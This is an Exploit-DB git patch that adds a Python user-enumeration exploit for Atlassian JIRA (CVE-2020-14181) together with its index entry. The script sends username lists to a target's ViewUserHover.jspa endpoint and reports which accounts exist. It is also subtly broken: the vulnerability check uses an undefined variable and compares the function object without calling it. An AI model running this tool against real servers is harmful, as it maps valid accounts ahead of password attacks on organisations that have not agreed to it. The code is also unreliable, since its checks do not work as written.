From 128b9cd18525c89fa804f4f6119d59a46ec16420 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 11 Mar 2021 05:02:04 +0000
Subject: [PATCH] DB: 2021-03-11

1 changes to exploits/shellcodes

Atlassian JIRA 8.11.1 - User Enumeration
---
 exploits/multiple/webapps/49633.py | 45 ++++++++++++++++++++++++++++++
 files_exploits.csv                 |  1 +
 2 files changed, 46 insertions(+)
 create mode 100755 exploits/multiple/webapps/49633.py

diff --git a/exploits/multiple/webapps/49633.py b/exploits/multiple/webapps/49633.py
new file mode 100755
index 000000000..200d1019d
--- /dev/null
+++ b/exploits/multiple/webapps/49633.py
@@ -0,0 +1,45 @@
+# Title: Atlassian JIRA 8.11.1 - User Enumeration
+# Author: Dolev Farhi
+# Vulnerable versions: version < 7.13.16,  8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
+# CVE: CVE-2020-14181
+# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.
+
+import sys
+import os
+import requests
+
+def help():
+    print('python3 script.py <target> <usernames_file>')
+    print('e.g. python3 script.py https://jiratarget.com usernames.txt')
+    sys.exit()
+
+if len(sys.argv) < 3:
+  help()
+
+server = sys.argv[1]
+usernames = sys.argv[2]
+
+random_user = '0x00001'
+
+try:
+  os.path.exists(usernames)
+except:
+  print(usernames, 'file does not exist.')
+  sys.exit(1)
+
+def test_vulnerable():
+  resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
+  if 'User does not exist: {}'.format(random_user) in resp.text:
+    return True
+  return False
+
+if test_vulnerable is False:
+  print('server is not vulnerable.')
+  sys.exit(1)
+
+f = open(usernames, 'r').read()
+
+for username in f.splitlines():
+  resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
+  if 'User does not exist' not in resp.text:
+    print('EXISTS', username)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0c273983f..9eee078a1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43819,3 +43819,4 @@ id,file,description,date,author,type,platform,port
 49625,exploits/php/webapps/49625.py,"Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-08,"Christian Vierschilling",webapps,php,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,
 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,
+49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,